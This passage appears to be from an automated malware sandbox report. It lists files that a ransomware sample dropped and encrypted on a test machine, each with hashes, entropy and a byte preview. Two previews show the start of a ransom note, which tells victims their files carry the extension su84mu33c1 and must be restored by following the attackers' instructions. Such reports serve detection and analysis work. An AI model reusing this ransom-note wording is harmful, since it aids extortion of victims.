.e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\QCFWYSKMHA.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839552641643961
          Encrypted:false
          SSDEEP:24:/L1f1tF3wo2QQcV6IhtDvDHtl6Qdgu/u6TBCxodj7X9IwlqR3nbXADn+zSM3:/L1fp3pHzVrrtl61IdBXCvRju+mM3
          MD5:A81EE22FE8BFBF1A4E94625E0FE68910
          SHA1:26DAA1A9C4F463E9E6D32187FBCD97BFF11E9328
          SHA-256:E138D1E52694E2EC3EDFFF42045A3585AE21D4E6D662FC9C301F3FAB761B7F45
          SHA-512:205DF6F132E61497C90BFCC9FEBC371D1DD312E54523AD9B94ED6A4451E83A5829E1CBC9D460F6BA64FFEAA43CD9951D0F7406D6FA2EDE31525527D721B429B9
          Malicious:false
          Preview: ...1|..j.T..,hq..x&...VRb.....~.W...I...HSK...W.[\H...j..9..#/.1...1...q_....H..q...q..O..>P....V..a.D./..........r...lZg....~.oX..G...].L.&.$." .!..S.`.\.....9.../.3&.6N.. {,9I.l..'k..T.GM..G..[OO.D.a\7..W..TA...+....Y.....*u.y.P8r..87)$.G.E....7.....p..>.].L.............P+...W.f..$..$G...D..R5...7....N..RF.T.X..~....R .......[...I.....{..c.'.......<A..\........_UA...CP%........4....@......2..+`_.},@..".h.......i.......~.2...w2......n.V..V..&....(&8.&.wO....r.G ux..Gx9nz..`.i.{....dO..);z.....Z..k.._.U.W......|#.w.Ye.o..yHz..U...E....^.0t......:....0V.o3......:.0%).3D.VCP..}.wi.@1m....N..N.7.D.L.ys2].I.&ov.s.]........~...k.`....@..M... bM.|.N.Qdh.2...P....Is.....\O...0...N..z.!....u.......t%..&....^o...3.~....0H..0..V.'.d...;...G.....E..D.z."....N.Q.p....,9jP:..|t..x.1{... z..............Y....z..,....|.W!\F...y..Vh.O....Q.\...q.>...k...NS....J...`..+.@..7.`.....(.6.A.........@..y.X......"B..f..v...D....R......N.A.^p;'@..?.J...._S..
          C:\Users\user\Documents\QNCYCDFIJJ\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\SFPUSAFIOL.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.843248130658393
          Encrypted:false
          SSDEEP:24:gC9wqFEViAs8sNylRbnbT3GZpWvZWD7OD1FflryM6K+KjU7TXADn+z7pEi:gM9qV6RAr2ZpWRWD7ORFdryM27u++i
          MD5:CBBE8B48787F880E7856C86A6FD8CB45
          SHA1:88A455C1FAB8B0921EF685F6E1B54B0AB8269EE0
          SHA-256:BA283207AA11355C7E726F5588639ED3126229852B393B650D35D85724642342
          SHA-512:3FF2D0E0787AE6111137C9788C4B9F2262D5A5153C3EAB5A98783F1C558879CEB5466E9730B5A5EA74073CF648301094A04D89F8B41C1D36FC5B0BA2DC4B0F88
          Malicious:false
          Preview: .wi...n._.4.<.)...V...~..;..P....HN`.>..j@...............c:\v~.><..X..........^0+y....j.[..[.#uN...6..d...Y...X..e#4i...F\.)/.....d.y...*..Y.S..oOW&.*....O9...F.T..F4........K..R...8....p...T..l].<.k....a.h..L$.u.u&.b.3P...Rp#*.....X.5......J..J...Qh..4..l.-.Q.2.-.n...p..A..x`.D.1..5}oU2...H%..n.kF3..9.._...1..o=.f9..#...U.t.>B8...6vd7q..Q..N+.1.'.:K...iV.yNeT0B.ax...N.@.O...Ld...N......v.Q.\_...y...c.C...Z2...3I8........e. ....i.~..="...:taWs....B..k*.)+l.;...(.3wL*$.i.....J....O...`..I... KL...Da{x.e.M.B*.....z.......Im...W...\..AY.,1....5.......dF.*$f,+..u ...!Sm......(!...b...BP..A...z.a.6..\....vS!dgI..@.......7....5....R)[...t...:......].8.....e .......f....}.$..B.d.`.X.....d....[F....... .......cM.ZY....%..].....0r.<.^....X.XLI9.....[}..0..f.&.p.FvN..g=.t...>_.............6o...K..Z.\.5.3..0.s4>Cp$...P j.....4.u.[{..d.5".(.3.Ix.....N...f.H*q..;b.....,.Dxu...././."....)......c...[.....`........A.[.=F4....UW..|y..vx?`..v...m...
          C:\Users\user\Documents\SFPUSAFIOL.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.824733974335746
          Encrypted:false
          SSDEEP:24:MpScBK5kpsu0GPMJKbS7m0TnDAYDdgm1l5LtONYzZgGS1XUXADn+zV0l:wxYkpc2MR7PLDdgm1lZ6YziUu++l
          MD5:D3B42D88112A3E11C3108C19039D930B
          SHA1:FA8DC3CEF4595F4EF38C85C7DA7CD06C4B3422B0
          SHA-256:36921D94D58383534B9418B37123F22B5F960DC4E876F8A5F3FD847E0D9107F1
          SHA-512:337966EAABF74A7B85945D59BCC073E403BC851C6359CDE42D09E63A73ABF7BF250D41E6FDB3C0857FD1F9F266384AB764F14BE6E74F099566112CEFEED04D17
          Malicious:false
          Preview: Xx.mcX.A......eq...K0....i+../Mj.2..k.0..F....vgX.Z...&tk+......H.o.._5..r.3.j.......5e..ml....p.MyP..:.M-.....4c.hk..p..w[.....N.........ox.m89.M~B.0..G..lq.SL.U.\.|t.......y.`_.......E..2^:I..qw..;!r...<>...D.5!...N..bd..w?d..6.v../...#.W.'s..A%..../........m..r.o4.*..5.D..C.BV`....s.l...s..-.r.l...H~5{.......KT...`4%.C..".v.c..s..l..K......6.9 ....,../...l...A.ct...c..@l..k.9L..I...9.f....'.}.4P9..l7.l....Z.P.[D2I.....*.@.^...V.0.I+.;19....h=c...ji.xy99....o...n.f:...S..8x..X.[.|R..k...|U.`u4z...................Fl...:.8.l...5w|.Y..I[......yT...i...E~+j...$.>L$0..('.....mR......j..y>C3(..aT....Ca...:....)9&..q.v[t..J..B.s....k0.?FW...gD>.......O.F.......f4.a_.'%..|01p.XY_.1..*+.2.Y..vx.p5.O..jm.k.....Q....O2i.7.I...3..G.V.uq.y......>.")......v0.$....G.....G...Uc....jA..uX._X.C......cP..*....z.o....M?ci%.V.Q5..lM....W.......V].....>.N.*..w@?..<....R#H_.p.B......m.ZO.S..<.v.m../....7.M.1..=.....p.........4..d.WR.[o.....7~6ws..B)=
          C:\Users\user\Documents\SQRKHNBNYN.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.831278155684688
          Encrypted:false
          SSDEEP:24:N48Aa1v77sfDgo4netxvrqRmTFLiNUe5mDCC3OC8ODGMvYSo+QaXADn+zhs9:j3B7aNhxWR2INeOC8ODDvYH+nu+a9
          MD5:FFBAC1957D0F18C6701B35F3136240E4
          SHA1:28347A57482BB711B6E197CC34C2FB96CD9677D5
          SHA-256:5C4CC11FC6822277E61AACEF9CA40FE82AC3682F5CD0EC06DCE9C551DDF9F78E
          SHA-512:63A2F45FEE8C59BFE45A8648FA98F552133A8824035ACE4EF56F1B03A6C80E6DF0B2AA5CFF746031D607926F80541B7CD0DA30E2CC027126F88CD8509C37BD87
          Malicious:false
          Preview: u>...%....M.../.|.-......5F.f...dP{L......nh.....Ws..e.*.S0~e.-...;.~..f.W`qb...ft.|H..K.....8TV..R.......d.Mf..X>.~....K...?...y...`.\.....DM.?...:%.../U.k...@b.1...{.?,8...fEb$.....PD|......yPGSs0J......#.`r.._.5R..}7.....z...}.....w=N.dg.........3..Cg.. R..XdP......>)...4^&......u..S8....".r.aq...(.~$..03.~k....ctG...QG..k.9.c...g.|.........Ot<..l.Y}U...~..:.Du..&..@.`3..V.c^&...~.....8*.UO......b.xN./.x.].lY..4.$..IoR@....?.......hf..b....oK...yY..m..O.......{5.?....1.7.>...6l.h...Hw.6;............m..,6...S.:....M.....R...^...al.-...f.....U....5...~<Q.Hw..!U..maJ%..X.8....H.._S..}a?J.s..Gy.0xd...d..B..g.l.{.A...r.P.h..R.Jk.M.nc`..?}=.-.l*>.U.=I,l..L...|7{........aB.r....yH..-m....;!6...z..R.....6.l.].....................}.pe...!..STI...ul7........U...z"..ZF...c..@e97.....ah...1M..S...-.{bK....Z.....*....h..Eo+...o..G..71....F.K.xa.t..+.0..q..5.%o1.Nh..e.I...h{.[....FUVK.}W..c...8..n.[4......5t..o!..<...........C-....fQ...,...@..
          C:\Users\user\Documents\SQSJKEBWDT.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839204522314622
          Encrypted:false
          SSDEEP:24:g/vXsIX7J2pgCQXzUi6vm2KExS3Rq7CfXQrJYWUgEZXADn+zk0X0:g/vsgJ2p+XYV+2f03E7TFKu+Vk
          MD5:E80F64563D1CF85D532666B7688F7051
          SHA1:86B560F19E5F2E9E5E8E323DC32FA132E16ED791
          SHA-256:04D69C7FCABC49E3721B3E00EB31860D293383F76AC74DA8536236B69479320B
          SHA-512:49E1FBFD93C8F3C95F64B8711C3D2B3B3B685BE023431A09F59B4B8845FBDB4C947157F04EF7293E9E8FF06AF1DCFE63B4E8A4C6CFB46D04C8AC9E1E112BF0CB
          Malicious:false
          Preview: .UR.mI.a.~....-2c........'.M..3r...33../...........>.8n.o.o.l'.a*.+(...A.v...Qe.b.m.ld._(.hP_`.I..0.._.d+M..n.o...MyM&.d.P..!..o...rn...4...Z3f}.e.F....Fh..Q...2.....E......{..."i........m.T.To.9E.....N.`+.....L.}...I@.z...28p"..M.>.&e.L.n...\.s.....v.....m.{.x.?......`<..r..9,...[.@.......ev.B%..l...Q..cme>1Q.UF!YlN......l...j......].0.%..l...h.zQ'..:.......l.5.c.W........a.....>.j.1..,.[c{....=.p7..Q.}...J..;......l`.'.|!..Db.....v'...........g.Z..4..s.#B..0&..#.t%3#..h~s6...:..Q....EZ1....]...;v.$..r..d.u.R... ..GwP.`...-.|. 2....k.9[..\J....=A;.?.1`u6.G'8.-.0....|.{h.b..B...p#..ZQ..z...iVf..2.^.-B.Tg.d.S.8.q....b.|+..D......i.o.5.E...C$Y...5..B.:....q.QP.......b..1;P.|#........>q....Hk.c..g..p.j...6..5=t.m.'....!.9...W+%-.fX4L.)....i......1Y..q"..W73*Z4.......M..#....pP..7...Zs..&....x..1a.w..rQS.*../...#t'...........s...?. 57....D.*...y..4...8..yM{.p.4.O+..'..3..].e..N.i...f../...xNs...H!*.1.~...)L..x.......J.....f.m=.S96...\%
          C:\Users\user\Documents\UOOJJOZIRH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.808644766194756
          Encrypted:false
          SSDEEP:24:sZ9nOS543Zt1mzHhLREiPa1F30LkMQHuvlABPUE+7hxaH/tTn2HXADn+zu:sfOS58ZtMREi8FELksABPy7na523u+S
          MD5:4F8C315287FEA716FE80B72076C74F33
          SHA1:FE3FD77F94184331F2725E383069E06F17FC93C4
          SHA-256:ABF86D0B5CE89CFAC72EFFCBE1EB7F3BE1996061CE8C44DF6BCFE2EC9BB8DBC8
          SHA-512:E3DC698A15C8CD052F85B3F2D880F01E6E765EB415EC99A824F9290A3D1151501F9BB634200D48F1734C362BC4D46BD29504AEFE479D4505189E88FF8DE213BE
          Malicious:false
          Preview: .X^....^Z.....f..lkS....(.... c.H..8V.n.."......`..Bz..e).kM.O.p|...^.KX..H...T.`1R.T.(........fz..jR..G.$A*...`p.%..k.....eE:.<......,T..O.,.T..S<3..'....6.1....k....5.G....N.c....JM7..T...5....b...3..w...../.G..~i.%....p....l.m_..)....%5....(.`..p..:..eA.>.j.E..4.....M...'.;r%/s.P...<....2......]D{..F.....()..A=..E...f.........V9.8......`.y../.w..~....j.H.....V...0.m..(0...).<.....Z....q.......(~....E.......ho>G.+.......Z.6H..^x]C..J..K..t.x .s.v...{_Z..t..$T...Z6]..>..B.... ...$F\.u.8.8I5.....5.pxgn/&..........wB...r .._...>l3.:...[K-.~..Ms.zE.....m.:._...Cp3....X.........Fc......34...q.I....^..8.CJ(K..9~..........A...................*^...zZ.:.....81..7S\k.8.[.N'.;6..M:...:.......\G..5.m.#.....-. 5..K.k..j'.Q-4e`......%.-...b(..M.L.lRM...R.....E7...C..N....0K.;.<a.<5w..z7.....\u...mQ.E.<B...p.Q.u..l.g.Sa.(i.e.)...I.9.y...~....3.r.W..(.8..Xq.....A..%bpe..^%},...H..71>...C..G..G....^.\.p..x*.v.. .7.[..H..g<...D.K7}..E.Xd..
          C:\Users\user\Documents\UOOJJOZIRH.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.822807993598277
          Encrypted:false
          SSDEEP:24:VO1oLI/wX6gK6SNjLEiWCSNqDmyHLCaNnnbv/PmM1nXADn+zPaD:VONgDSNjI4SLyrvNb3Pbu++D
          MD5:C3F28E1262CAD95D7BAAA8641A01340D
          SHA1:AE0AB910341BFD85BB70428C75B1DAADE769DB5E
          SHA-256:DD15B32A353D272CB44EB2A3BC6384C1631A725D44851F5F514CA231BDE8EF01
          SHA-512:BD878065E9CFF5E4003A19FEAA4D205A047931FAD15B6FE38A03273AA80518C4E8610D70614F9541D11C70C50E06EAF7834682CF2B673AF8B01007622D566053
          Malicious:false
          Preview: ..S....R..D.....5N...DU6..s.j.5.:....{-...[Bpr.H...i9..y.{..n`L...!......`AQ...^"c..N..<...B....bg.`.'.V|j...I...-W...o0"~xi.~[.6.H...Z.......O.<uO.g..._n..7..!..Ne..\...q.x.N..:...W.H.u.^.)..:......OP,..r.....7..VmD..mA.3.y.G<...].[.Y.^m.0...F.D.M.i.*F..bQ.:....s. ..r\?.......8..o.:@{....^... Pr]S\.;W...(....|.>...B;}p..@.p...F..>.._2....,....}W}F.*._8%..o..bD....Z%8..dg.VG....@.->......U. .S...|>.'.X."o..7.).$...m..}..(..bi.k..x/.."...2.=.q.g.RfFB{"f.....j.>.aN&..O.0..[,3..R.;~I.$".Y.5...=...e...hr....=....W.p.QD..................z&.h.....3..r.1..J..........R|q..v.\....M.8...~.....jbz_..C%.......Y.|.E.4.......by....Vj.<./X*..5....>:.Ga..T..Y..BiF.....|...2.i.....h..>.;`..%..3F.Q...].:.~w..P.....~.0T......)m......>Q.._U..).5..G...!7...ct.T.......s0T...o.hU.t...`..G"ZO"...(z46w&..i2......ji..5....U.....%t.M.b...o9....C...j.9......."A.../f1..... .l..S|.........QJ...Q8.}..yH&R..9....;ozT.. .7.F.8{....Ph...p.............Fe..5_
          C:\Users\user\Documents\UOOJJOZIRH\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .s.u.8.4.m.u.3.3.c.1.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.
          C:\Users\user\Documents\VAMYDFPUND.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.831513261165445
          Encrypted:false
          SSDEEP:24:5zEGicBOfJIf4b/haCFjjAzJrOXLR/wqLl6Js+mXzXADn+zQfK:5EGxfSjjA9uV/PLl6lGu+v
          MD5:0CA760E2E36EF81EAEFA33F7267A7089
          SHA1:341B0B04BAC50D1BF97F63AFE40D5E5253FA2D1C
          SHA-256:E9B5BE32AF64187BC8725D1811427C7223DEB8C692E5AF4BED6EA5AF5F3198EE
          SHA-512:A4F8EDBEC5591EFA097C8F8354BB02454282552965203BB2F52A1C26D7A6641FC98501B6F663BF04E1C951DCA5E3CC6BA4F14175D6EF652137A6C134B7356513
          Malicious:false
          Preview: ...y.#.M.zj....}.........R#.;.$..&i....G...w..{......;.+.ltd...a..1..K.ST..[..A..4PT.|.W.+....:r..q9S..../.!Kr$v....=i$.`T.<CH%...b.]n..1....I0.<\.,a.Lb].2.R.G....<OF1...`...d.X..ET..\.......~....@E..j..].DT.*........m...<.Li..J..Z../.P.AP.4....3...bN....s..NCo..k.[..g....<O..O.o...l*..i..j...9..g...&..P.5....@..9N.Qr..G.......k..l...:..;..C'.eA..$.q8..x......"......?s.3...|.......R...#...mc..^1 ...a!e.h.+....S..?...6..o_............Y.i.Q)....p.D....Q..}V.....".^q....k.L....K6.R......F....z.....y..'..S-.Q.sG...D.U.c:X.0D..G..d....+J4..r.P..".FUR...-A/..yD...YCC&Y.R..i]H..93....0..x...!....=.S8'@..o.r.\I.M~. ...H}Y..jI.N.{......E6...~.I..s{)....4.fj.. X.J$..o{%..r.R.vpH..Y..<...f.4.mj...C!.joH..4!.(...qa.......\.%Z..._.II..QMk.{C..&.Yz.Q...$...@..5.?....h...Ao@z......^.A..9..+..>'.IL~cK....N.]..Bd.S..6.H.......$...R.|......?....."{K:.....@q.ISl.N..\.Q...!...l..>.SS..M.m..G>.....p..i..X5.l.,.Q....+fP...%......'.....[;...L.2PU?#'...e.:..B.
          C:\Users\user\Documents\VAMYDFPUND.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.825888557065069
          Encrypted:false
          SSDEEP:24:gcjjyOX1GaNRDu73g4qgaD4Im1bCoFhwwFm6dU8y8hONUp46F630JXADn+ztB:Hj74M52bdFTiwT6kdu+/
          MD5:4F4607D5674BDCA4EBE9AEB6E196CB00
          SHA1:0083FE7EEFFA25DFDCFA49031F507DA52833B3D4
          SHA-256:94B8768C26A9D3414A1C1361DC3519E2F117277AE8ECDCF1F15FEC7362D06BC8
          SHA-512:CEF690A688A0915AC8601E82922668367531ED1B7DB756820E676E41C2F783A4F600579805306216CE420C76DEA1C0F762FDBC4A7D89DB504F282A62EDDE5F3D
          Malicious:false
          Preview: l.... \... ..bc.u.?..{...;=N..'..y'.V.h...).....|;.F$....0.9.Y..\.2..t:...B.GNO.;.X.n,Lm.o......h...]Zw...Y.Q.A`......E.a.D..A.Q.....v.....-?....R.G*.....W.[c.+JiEl.(.j....f...L.....+5...:-.3.[.yt.J.o.Z&*hK@yN..t..R....j.9...i...+1.V..7......C*F...!`E.....Dr.3L..w...f......B.u.FW..t.....@.f3...c.w[.c........$*..).wk7.~..T....H...dp....^.Ze.(..2..H@ob./Ypw.G&..^..,..McX82x.;x....O.|r:......J...Xmq~O?.t.R....d .E.6@=U....`...(5p.T.m.B2a..d4..}..B.g...FG...|,k..v.%......B.0.j.....`.6m.!.)..........j1...4.......$..c..........@,..=~oa..o.......Ob.8j,...r.lD#..M............I.n;..D.e.sg.....@..8.4..tb.k...e......W.W.sm.%...N.....%Y.2...C.A.0.Q......h.N..i..|....h..Zw(...)...$.jI.)]!..w<......@...x|.{....5=c.V...A.#.]..Aom....R..2..."..QR".......j_p.C,..........B$DS..........._M.....V.}{.....p....c.Q..g...;.B.G..#~.era....;.p......H.H..I...Y9\....~...l.Z....Mv.e:...k..).X.....t...3.1.*...j.K0.Z*..].Q.^=.......w......{U.f&.M&j..........]lV.......?N|..
          C:\Users\user\Documents\VAMYDFPUND.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.833268952968747
          Encrypted:false
          SSDEEP:24:0mF12mywZgwpuIo6t/M6Mm5B/SaO0oRUX0XADn+z77Sg:0M1vywZh5oK7N5SaNoRu+3Wg
          MD5:5E9AEBC0893D9D7C0EEC1209D344A393
          SHA1:A513E74B82989500167B1FD2B76ECF813F500331
          SHA-256:86BD4F250B730827EBB1BA4555C4672CF0AF2B78303B9B3850B7F2C5063952C3
          SHA-512:AF22461C0E109329A2291D70B3FCB82C666373359D8DF0B7A090D5E68F50497745957C1210EDA01DAFB6B0E7A6137655EFC40007AA8B28330EE884C8829EDC25
          Malicious:false
          Preview: Cl"..Y......t.0..D...`.:.hS.'..kz<.!W.&......WV~z~.>...DE.V..t.._...XLc.M:..Q.`...U".......F~.F..c.U.x..@!.fS....s...1..<...$...M....S<..Z.6_.c.........K.Y...O...7I.......&%./...\@C.....^l.Kc......`..[.........}...&.le.2........XV~..m..pCh..C..w./...:.......`..K........T..D:....pZX.......!{....{6c........_..jX.q.Ag".5.$.3.Z....\m.%.......0...J..]....A.O.DZ.D.....v.Q.G}i..9.@.....U./...........5`B...>...."..F.........*!.,....}.2...<..i?;..O..@..YQU...._..1.O.f....`Fg%...#..I.Q.. ....p..B..l.G.$..........j3Lk?.y..A..].62.3...j..<...L{.Z.*.0....G..:.]=.Roj....VM.N...-8p..*^l....O.N~'@....HfEJ)."o..S."..l....2z.Fr..`.o/..;!.@.$.9..|!......9....6..`.;.%.U.M.lU.a<........I0t.....|..k./{B...(Z..;>9.....y..3)g1.:cd....9..n</.F./.:/..+.=y.e"..X...bh1..>..Lq ...[...@.e7=.<..vB......6.<x[...._..l...F..l..........b2......!....."B^........V6....3. .7...G.F.........[....Z...b..)d,.....g..v.....'...h.Z!.2.a..#e/..B........#i)4.BW..`.+]....=../Z......zK
          C:\Users\user\Documents\VAMYDFPUND\GRXZDKKVDB.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.841121542947761
          Encrypted:false
          SSDEEP:24:LJKpCXFOCL24QluyCSuPp5Gs7muJ9ms59wpUlPtbraXADn+zFGyg:LKlCL23gyRUnmQj9wpAau+rg
          MD5:0A755440B0547110864B5E7850F85CEF
          SHA1:C1F64809182BB192B667D621D3719C269DDABD72
          SHA-256:B3B840CEDCB20F1ED51D88616C0466CE9AB7FB176E069D0A09C8F36F330FC856
          SHA-512:9FFBB36C97514812B668C27DEC9D397D6095458B61E3A0DD467F25E5C2D281E074F91E3E4BF1A00385442C7831FFDAD1A86BE0BDFA6173E82B0C08F92D4EEE15
          Malicious:false
          Preview: ......1.Y.%.M\....4..d=.......k..Q.^j..].v.<\(tk.sv.....B..lr.'.h........|s....1....2%..qH.>.CI.uh.z@.....D....c..,.....H..W...].^.....3....GO........Y.%W..P..zl........tn]!.K17....0......I...a.3[M<..4.8.L....1......n..d.l.H..P.....k..l...=..2..F..{..6.......M.X.g.(.....~..........p...4>`..a9..Q....%.t......l$.I....|.......H...yD....X*x.......J={s.|..zE .......5.A...B..H..#_u-I....BT..{..#.6.2..F.H2>..I..e....S~.e..S.o..P..!.h.OR..l.'.Fw......[[.8..C..|.<...H..L.s...F..y.`........g.".7.59.Mn%Y..2.).<bF".fT..[.3!w..E.L/.#..Ow}.L=.....F.KN.....5...S..<.~....v.Z.P..>.j..I..X.gF.5........bi.f...r.*Z'..k*~.uv..|..{...X,.....G.m.j.Y=..?.kTd..m....1...Y...;<..<.Y....B...d$.....C.|.E..9...krez.4.~.u.7.^..#.A..ij...Lk.h.z~..]h.:..b...lG...e>....>0u..s-..j..#..rIOP.e}..|...;..dL..~P5.W.....d.[`..`.z.ft..Q. *..?K......?.F......w..w+... .<g.yZ...AaY..Q..3........<p...5,.1..j(...K.....jQ-.[.2..f.7]....%q.N....7...}......g..=....H....yJ......#..
          C:\Users\user\Documents\VAMYDFPUND\PWCCAWLGRE.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844956780105802
          Encrypted:false
          SSDEEP:24:6WihKT4dSyxpawf+0Jgtkm3nLi9nZHvOaEOWVHrpJMEMXADn+z10:4hdS+HW0kkknLi7POaE7ZvFcu+W
          MD5:E55F7A6CECA0019EBD7E0296B1C05DE3
          SHA1:5BCDA2F3F925763A5CBAFE3B3E52EB460F30BCCB
          SHA-256:774627705FD0392C0B0BD11D35ACEEFEC0F9D2C4395FA852E1EBF94802E198AF
          SHA-512:55FE95F2DE664F775F0B02533C506B0F7BD071FCC0AA45BAF76F0A9F4F467E26C81586946FDE3C2C5172997BFB26CAAB69918D78C2D0125B7A5836F5D6516FA7
          Malicious:false
